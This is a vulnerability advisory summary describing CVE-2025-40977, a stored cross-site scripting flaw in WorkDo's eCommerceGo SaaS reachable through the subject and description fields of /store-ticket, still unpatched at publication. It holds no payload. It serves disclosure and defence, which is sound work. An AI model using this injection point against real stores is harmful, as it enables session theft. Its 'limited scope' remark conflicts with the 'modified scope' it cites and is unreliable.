CVE-2025-40977

Vulnerability

Overview

CVE-2025-40977 describes a stored cross-site scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS application. The root cause is the lack of proper validation of user-supplied input in the subject and description parameters of a POST request to the /store-ticket endpoint. This allows an attacker to inject malicious scripts that are stored on the server and later executed in the browser of any user viewing the affected data [1].

Exploitation

Prerequisites

To exploit this vulnerability, an attacker must be able to send a crafted POST request to /store-ticket. The vulnerability is classified with a CVSS v4.0 base score of 5.1 (Medium), with a vector indicating the attack requires low privileges and user interaction. This implies that while authentication may be required, the successful exploitation relies on a victim (such as an administrator or support agent) viewing the maliciously crafted ticket [1].

Impact

A successful stored XSS attack can lead to the execution of arbitrary JavaScript in the context of the victim's session. This can be used to steal session cookies, impersonate the victim, or perform unauthorized actions within the application. The scope of impact is limited to the affected component, as indicated by the modified scope in the CVSS vector [1].

Mitigation

Status

As of the publication date (January 12, 2026), no official patch or workaround has been announced by WorkDo. The advisory from INCIBE notes that no solution has been reported at the time of publication [1]. Users of eCommerceGo SaaS should monitor vendor communications for updates.